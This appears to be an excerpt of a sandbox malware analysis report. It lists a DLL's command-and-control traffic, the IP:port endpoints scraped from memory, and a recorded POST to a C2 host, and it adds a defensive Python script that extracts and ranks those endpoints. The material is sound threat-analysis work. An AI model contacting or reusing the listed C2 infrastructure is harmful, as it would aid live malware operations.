                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:49 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:51 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:53 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:55 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:57 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.15.12Date: Thu, 28 Oct 2021 02:53:59 GMTContent-Type: text/plain; charset=utf-8Connection: close
                      Source: unknownTCP traffic detected without corresponding DNS query: 143.244.140.214
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.77.0.96
                      Source: unknownTCP traffic detected without corresponding DNS query: 185.56.219.47
Source: rundll32.exe, 00000004.00000003.377435107.00000000056FF000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsF
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.4.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000004.00000003.376611572.00000000056FD000.00000004.00000001.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?f09641962053d
The URL strings below were scraped from process memory, so most of them are not distinct endpoints. Characters after the first slash (/Q#, /hy, /oft, /soft, /aenh.dll, /ography, /Microsoft) and the mangled hosts (18192.46.210.220, 1845.77.0.96, 453.244.140.214, 455.56.219.47, di3.244.140.214, 14.77.0.96, 19.77.0.96, 182.46.210.220, 193.244.140.214, 195.56.219.47) are overlapping or partially overwritten copies of the same buffer; the fragments ending in aenh.dll, ography, graphy and Microsoft are most likely pieces of neighbouring crypto-provider strings rather than request paths. Four endpoints recur and their IPs match the traffic recorded above: 143.244.140.214:808, 185.56.219.47:8116, 192.46.210.220 (TLS on 443) and 45.77.0.96:6891.

Source: loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp; String found in binary or memory: https://14.77.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214/
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214/Q#
Source: rundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214/v
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/
Source: loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/#Gq
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/%)
Source: loaddll32.exe, 00000000.00000003.756126236.000000000166D000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.567390680.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/&
Source: loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/-ZY
Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/0
Source: loaddll32.exe, 00000000.00000003.399573978.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/3
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/7)
Source: loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/8D
Source: loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/8DH
Source: loaddll32.exe, 00000000.00000003.414827142.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/B
Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/F)
Source: loaddll32.exe, 00000000.00000003.414827142.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.730453084.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/H
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/K(
Source: loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/My
Source: loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/O
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/O)
Source: loaddll32.exe, 00000000.00000003.658533321.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/P
Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/Q)
Source: loaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/S
Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/Y
Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/b)
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.554969204.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.730453084.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/hy
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/k)
Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/l
Source: loaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/lB(
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.600682349.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.618224210.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/oft
Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/p
Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/t)
Source: loaddll32.exe, 00000000.00000003.738944864.00000000016DB000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/u
Source: loaddll32.exe, 00000000.00000003.494287191.000000000166F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.641039934.00000000016DB000.00000004.00000001.sdmp; String found in binary or memory: https://18192.46.210.220/
Source: loaddll32.exe, 00000000.00000003.569464960.00000000016DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.771944761.00000000056FB000.00000004.00000001.sdmp; String found in binary or memory: https://182.46.210.220/
Source: loaddll32.exe, 00000000.00000003.641066942.0000000001675000.00000004.00000001.sdmp; String found in binary or memory: https://1845.77.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47/
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47/&
Source: loaddll32.exe, 00000000.00000003.392156959.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47/4
Source: loaddll32.exe, 00000000.00000003.392156959.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47/g
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.739023483.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.547755261.00000000034C9000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/
Source: loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/)
Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/0
Source: loaddll32.exe, 00000000.00000003.658533321.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/3
Source: loaddll32.exe, 00000000.00000003.708744109.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/4
Source: loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.756126236.000000000166D000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.519076756.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/4.140.214:808/hy
Source: loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/8D
Source: loaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/B
Source: loaddll32.exe, 00000000.00000003.742305887.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/H3
Source: loaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/O
Source: loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/Ps%
Source: loaddll32.exe, 00000000.00000003.586087040.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/S
Source: loaddll32.exe, 00000000.00000003.703443485.0000000001675000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/V
Source: loaddll32.exe, 00000000.00000003.676183514.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/Y
Source: loaddll32.exe, 00000000.00000003.629814185.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/fW
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/i#
Source: loaddll32.exe, 00000000.00000003.594551032.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/ll
Source: rundll32.exe, 00000004.00000003.741865046.00000000034C9000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/o)
Source: loaddll32.exe, 00000000.00000003.708727054.00000000016DB000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/p
Source: loaddll32.exe, 00000000.00000003.750936613.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/rS
Source: loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.703443485.0000000001675000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.494287191.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/soft
Source: loaddll32.exe, 00000000.00000003.444519765.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/y#
Source: rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://19.77.0.96:6891/
Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.390529394.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/
Source: loaddll32.exe, 00000000.00000003.436575966.000000000166B000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/%Ev
Source: loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/)
Source: rundll32.exe, 00000004.00000003.533230659.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/.
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/4
Source: rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/7.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/?
Source: loaddll32.exe, 00000000.00000003.747478637.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/C
Source: loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/HL
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/J
Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/Q
Source: loaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/TL
Source: loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/X
Source: loaddll32.exe, 00000000.00000003.600682349.0000000001676000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.439196608.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/aenh.dll
Source: loaddll32.exe, 00000000.00000003.453087889.0000000001672000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/aenh.dllc
Source: loaddll32.exe, 00000000.00000003.530192281.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/aenh.dllltbac
Source: loaddll32.exe, 00000000.00000003.577873723.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/aenh.dllm
Source: loaddll32.exe, 00000000.00000003.521947137.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/coro8
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/g
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/hL
Source: loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/i
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/n
Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.581920217.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/ography
Source: loaddll32.exe, 00000000.00000003.713747345.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/r
Source: loaddll32.exe, 00000000.00000003.449677667.00000000016DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://193.244.140.214:808/
Source: loaddll32.exe, 00000000.00000003.626454578.00000000016DB000.00000004.00000001.sdmp; String found in binary or memory: https://195.56.219.47:8116/
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96/
Source: loaddll32.exe, 00000000.00000003.395037799.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96//Fm
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96/F7
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.547755261.00000000034C9000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/)
Source: rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/.
Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/.0.96:6891/
Source: loaddll32.exe, 00000000.00000002.769348582.000000000166E000.00000004.00000020.sdmp; String found in binary or memory: https://45.77.0.96:6891//
Source: loaddll32.exe, 00000000.00000003.719882602.0000000001675000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/08/
Source: loaddll32.exe, 00000000.00000003.399573978.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/08/Y
Source: loaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/08/l
Source: loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.418080162.000000000166E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/14
Source: loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/14H
Source: loaddll32.exe, 00000000.00000003.408181456.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/4
Source: loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/6/
Source: loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/65
Source: loaddll32.exe, 00000000.00000003.497146679.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/8
Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.458615929.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/Microsoft
Source: loaddll32.exe, 00000000.00000003.431000649.000000000166D000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/R
Source: loaddll32.exe, 00000000.00000003.569505666.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/S
Source: loaddll32.exe, 00000000.00000003.519010998.00000000016DB000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/X
Source: loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/Y#
Source: rundll32.exe, 00000004.00000003.541565391.00000000056FE000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000002.771944761.00000000056FB000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/graphy
Source: loaddll32.exe, 00000000.00000003.604985676.0000000001672000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/h.dll
Source: rundll32.exe, 00000004.00000003.612166801.00000000034C9000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/o)
Source: loaddll32.exe, 00000000.00000002.769348582.000000000166E000.00000004.00000020.sdmp; String found in binary or memory: https://45.77.0.96:6891/p
Source: loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.612166801.00000000034C9000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/r
Source: loaddll32.exe, 00000000.00000003.574895771.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/ra
Source: rundll32.exe, 00000004.00000003.612201176.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/v
Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://453.244.140.214:808/
Source: loaddll32.exe, 00000000.00000003.586077792.00000000016DB000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.458615929.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://455.56.219.47:8116/
Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://di3.244.140.214:808/
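
The mangled hosts and trailing junk in the list above make the raw string hits a poor IOC feed on their own. The script below is an added example, not part of the Joe Sandbox report or its tooling: it turns report lines into a ranked endpoint list by rejecting anything that is not a well-formed IPv4 URL, counting how many distinct memory dumps contained each host:port, and confirming each host against the IPs the sandbox saw on the wire. The embedded excerpt is a constructed subset of the lines above; the regexes tolerate both the spaced and the unspaced "sdmpString found" form.

```python
"""Recover the real C2 endpoints from sandbox memory-string hits.

Added example, not part of the sandbox report. Memory-scraped URL strings
contain truncated copies, trailing bytes from adjacent buffers and
single-byte corruptions; this keeps only syntactically valid IPv4
endpoints, ranks them by the number of distinct memory dumps that held
them, and confirms them against the IPs observed in network traffic.
"""
import re
from collections import defaultdict

# Constructed input: a representative subset of the report's traffic and
# "String found in binary or memory" lines.
SAMPLE_REPORT = """\
Source: unknown; TCP traffic detected without corresponding DNS query: 185.56.219.47 (reported 12 times)
Source: unknown; TCP traffic detected without corresponding DNS query: 143.244.140.214 (reported 14 times)
Source: unknown; TCP traffic detected without corresponding DNS query: 45.77.0.96 (reported 2 times)
Source: unknown; HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: loaddll32.exe, 00000000.00000003.628735432.0000000001672000.00000004.00000001.sdmp; String found in binary or memory: https://14.77.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214/Q#
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/
Source: loaddll32.exe, 00000000.00000003.400716165.0000000001673000.00000004.00000001.sdmp; String found in binary or memory: https://143.244.140.214:808/#Gq
Source: loaddll32.exe, 00000000.00000003.494287191.000000000166F000.00000004.00000001.sdmp; String found in binary or memory: https://18192.46.210.220/
Source: rundll32.exe, 00000004.00000003.441859991.00000000056FE000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/
Source: loaddll32.exe, 00000000.00000003.600682349.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://192.46.210.220/aenh.dll
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.547755261.00000000034C9000.00000004.00000001.sdmp; String found in binary or memory: https://185.56.219.47:8116/
Source: loaddll32.exe, 00000000.00000003.626454578.00000000016DB000.00000004.00000001.sdmp; String found in binary or memory: https://195.56.219.47:8116/
Source: loaddll32.exe, 00000000.00000003.469611950.0000000001674000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.476592616.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://45.77.0.96:6891/
Source: loaddll32.exe, 00000000.00000003.764620245.000000000166E000.00000004.00000001.sdmp; String found in binary or memory: https://453.244.140.214:808/
Source: loaddll32.exe, 00000000.00000003.680591172.0000000001676000.00000004.00000001.sdmp; String found in binary or memory: https://di3.244.140.214:808/
"""

STRING_HIT = re.compile(r"^Source:\s*(?P<src>.*?)[\s;]*String found in binary or memory:\s*(?P<s>\S+)")
TCP_HIT = re.compile(r"TCP traffic detected without corresponding DNS query:\s*(\d+(?:\.\d+){3})")
TLS_HIT = re.compile(r"HTTPS traffic detected:\s*(\d+(?:\.\d+){3}):(\d+)\s*->")
# Anchored directly after the scheme, so a five-digit "octet" such as 18192 cannot match.
URL = re.compile(r"^(?P<scheme>https?)://(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<port>\d{1,5}))?/")


def parse_endpoint(s):
    """Return (ip, port) for a well-formed IPv4 URL, else None.

    Anything after the first '/' (e.g. '/Q#', '/aenh.dll') is ignored: it is
    whatever followed the URL in the scraped buffer, not a request path.
    """
    m = URL.match(s)
    if not m:
        return None
    ip = m.group("ip")
    if any(int(octet) > 255 for octet in ip.split(".")):
        return None  # e.g. 453.244.140.214: an overwritten leading byte
    port = int(m.group("port")) if m.group("port") else (443 if m.group("scheme") == "https" else 80)
    if not 1 <= port <= 65535:
        return None
    return ip, port


def extract_c2(report_text):
    """Split memory-string endpoints into confirmed / suspect dicts and a rejected list.

    confirmed: (ip, port) -> number of distinct memory dumps, host seen on the wire
    suspect:   same, but the host never appeared in traffic (likely a corrupted copy)
    rejected:  raw strings that are not well-formed IPv4 URLs
    """
    seen_on_wire = set()
    support = defaultdict(set)  # (ip, port) -> set of memory dump identifiers
    rejected = []
    for line in report_text.splitlines():
        if m := TCP_HIT.search(line):
            seen_on_wire.add(m.group(1))
        if m := TLS_HIT.search(line):
            seen_on_wire.add(m.group(1))
        m = STRING_HIT.match(line)
        if not m:
            continue
        endpoint = parse_endpoint(m.group("s"))
        if endpoint is None:
            rejected.append(m.group("s"))
            continue
        support[endpoint].update(re.findall(r"\S+\.sdmp", m.group("src")))
    confirmed = {ep: len(dumps) for ep, dumps in support.items() if ep[0] in seen_on_wire}
    suspect = {ep: len(dumps) for ep, dumps in support.items() if ep[0] not in seen_on_wire}
    return confirmed, suspect, rejected


if __name__ == "__main__":
    confirmed, suspect, rejected = extract_c2(SAMPLE_REPORT)
    for (ip, port), n in sorted(confirmed.items(), key=lambda kv: -kv[1]):
        print(f"C2  {ip}:{port}  ({n} memory dumps, host seen on the wire)")
    for (ip, port), n in suspect.items():
        print(f"??  {ip}:{port}  ({n} memory dumps, never seen on the wire)")
    for s in rejected:
        print(f"xx  {s}  (malformed IPv4 literal)")
```

Run against the full list, the four confirmed endpoints dominate the dump counts, the single-byte variants (14.77.0.96, 195.56.219.47, 193.244.140.214, 182.46.210.220) land in the suspect bucket because they never appear in traffic, and the overlapping forms are rejected outright. A port-less entry for a host that also has an explicit non-default port (143.244.140.214 with and without :808) is usually a truncated copy; the script reports both so the analyst can decide.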
Source: unknown; HTTP traffic detected:
    POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_6EBC39F9 InternetReadFile,
Source: unknown; HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.46.210.220:443 -> 192.168.2.5:49753 version: TLS 1.2
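
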